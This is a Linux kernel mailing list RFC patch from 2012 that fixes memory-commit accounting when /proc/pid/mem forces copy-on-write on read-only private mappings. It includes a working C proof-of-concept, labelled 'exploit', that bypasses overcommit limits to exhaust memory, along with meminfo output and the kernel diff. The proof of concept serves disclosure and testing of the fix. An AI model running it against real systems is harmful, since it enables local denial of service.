[PATCH RFC] mm: account VMA before forced-COW via /proc/pid/mem

From: Konstantin Khlebnikov
Date: Mon Apr 02 2012 - 11:36:34 EST


Currently kernel does not account read-only private mappings into memory commitment.
But these mappings can be force-COW-ed in get_user_pages(). This way we can freely
overcommit memory usage. And I'm afraid not only /proc/pid/mem able to trigger this.

This patch counts VMA into memory commitment before forced-COW in /proc/pid/mem.

Signed-off-by: Konstantin Khlebnikov <khlebnikov@xxxxxxxxxx>

---

before patch:

$ ./private-overcommit 6
before:
AnonPages: 705912 kB
CommitLimit: 3964536 kB
Committed_AS: 1225340 kB
after:
AnonPages: 6991060 kB
CommitLimit: 3964536 kB
Committed_AS: 1226596 kB

after patch:

$ ./private-overcommit 6
before:
AnonPages: 98760 kB
CommitLimit: 3964512 kB
Committed_AS: 369864 kB
after:
AnonPages: 6378052 kB
CommitLimit: 3964512 kB
Committed_AS: 6662064 kB

Now overcommit control can work:

$ sudo sysctl vm.overcommit_memory=2
$ ./private-overcommit 6
before:
AnonPages: 105252 kB
CommitLimit: 3964512 kB
Committed_AS: 386884 kB
pwrite: Input/output error
pwrite: Input/output error
pwrite: Input/output error
after:
AnonPages: 3292332 kB
CommitLimit: 3964512 kB
Committed_AS: 3533468 kB

exploit:

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <signal.h>
#include <fcntl.h>

int main (int argc, char **argv)
{
size_t size = 1 << 30, off;
int count;
void *ptr;
int pid = 0, fd;
char path[64];

count = (argc > 1) ? atoi(argv[1]) : 1;

system("echo before:");
system("grep AnonPages /proc/meminfo");
system("grep Commit /proc/meminfo");

if (setpgid(0, 0))
return 2;

ptr = mmap(NULL, size, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
if (ptr == MAP_FAILED)
return 2;

while (count--) {
pid = fork();
if (pid < 0) {
perror("fork");
break;
}
if (pid == 0) {
pause();
return 0;
}
sprintf(path, "/proc/%d/mem", pid);
fd = open(path, O_RDWR);
if (fd < 0) {
perror("open");
break;
}
for (off = 0; off < size ; off += 4096)
if (pwrite(fd, "*", 1, (unsigned long)ptr + off) != 1) {
perror("pwrite");
break;
}
}

system("echo after:");
system("grep AnonPages /proc/meminfo");
system("grep Commit /proc/meminfo");

kill(0, SIGINT);
return 0;
}
---
mm/memory.c | 54 ++++++++++++++++++++++++++++++++++++++++++++++++++++--
1 files changed, 52 insertions(+), 2 deletions(-)

diff --git a/mm/memory.c b/mm/memory.c
index 9b8db37..c2c97d8 100644
--- a/mm/memory.c
+++ b/mm/memory.c
@@ -57,6 +57,7 @@
#include <linux/swapops.h>
#include <linux/elf.h>
#include <linux/gfp.h>
+#include <linux/security.h>

#include <asm/io.h>
#include <asm/pgalloc.h>
@@ -3790,6 +3791,43 @@ int generic_access_phys(struct vm_area_struct *vma, unsigned long addr,
#endif

/*
+ * Verifies that vma is accounted, otherwise tries to charge it.
+ * Returns length of accounted area starting from given address.
+ */
+static unsigned long __account_vma(struct mm_struct *mm,
+ struct vm_area_struct **pvma, unsigned long addr)
+{
+ struct vm_area_struct *vma = *pvma;
+ unsigned long ret;
+
+ /*
+ * Already accounted or not accountable?
+ * See accountable_mapping() and mprotect_fixup().
+ */
+ if ((vma->vm_flags & (VM_ACCOUNT | VM_NORESERVE | VM_SHARED |
+ VM_HUGETLB | VM_MAYWRITE)) != VM_MAYWRITE)
+ return vma->vm_end - addr;
+
+ up_read(&mm->mmap_sem);
+ down_write(&mm->mmap_sem);
+ *pvma = vma = find_vma(mm, addr);
+ if (vma && vma->vm_start <= addr) {
+ ret = vma->vm_end - addr;
+ if ((vma->vm_flags & (VM_ACCOUNT | VM_NORESERVE | VM_SHARED |
+ VM_HUGETLB | VM_MAYWRITE)) == VM_MAYWRITE) {
+ if (!security_vm_enough_memory_mm(mm, vma_pages(vma)))
+ vma->vm_flags |= VM_ACCOUNT;
+ else
+ ret = 0;
+ }
+ } else
+ ret = 0;
+ downgrade_write(&mm->mmap_sem);
+
+ return ret;
+}
+
+/*
* Access another process' address space as given in mm. If non-NULL, use the
* given task for page fault accounting.
*/
@@ -3798,6 +3836,7 @@ static int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
{
struct vm_area_struct *vma;
void *old_buf = buf;
+ unsigned long force = write ? 0 : ULONG_MAX;

down_read(&mm->mmap_sem);
/* ignore errors, just check how much was successfully transferred */
@@ -3806,15 +3845,24 @@ static int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
void *maddr;
struct page *page = NULL;

+again:
ret = get_user_pages(tsk, mm, addr, 1,
- write, 1, &page, &vma);
+ write, force > 0, &page, &vma);
if (ret <= 0) {
+ vma = find_vma(mm, addr);
+ if (!vma || vma->vm_start > addr)
+ break;
+ /*
+ * Use forced-COW only on accounted-vma, otherwise
+ * we can COW too much and overcommit memory usage.
+ */
+ if (!force && (force = __account_vma(mm, &vma, addr)))
+ goto again;
/*
* Check if this is a VM_IO | VM_PFNMAP VMA, which
* we can access using slightly different code.
*/
#ifdef CONFIG_HAVE_IOREMAP_PROT
- vma = find_vma(mm, addr);
if (!vma || vma->vm_start > addr)
break;
if (vma->vm_ops && vma->vm_ops->access)
@@ -3842,6 +3890,8 @@ static int __access_remote_vm(struct task_struct *tsk, struct mm_struct *mm,
kunmap(page);
page_cache_release(page);
}
+ if (force)
+ force -= bytes;
len -= bytes;
buf += bytes;
addr += bytes;

--
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@xxxxxxxxxxxxxxx
More majordomo info at http://vger.kernel.org/majordomo-info.html
Please read the FAQ at http://www.tux.org/lkml/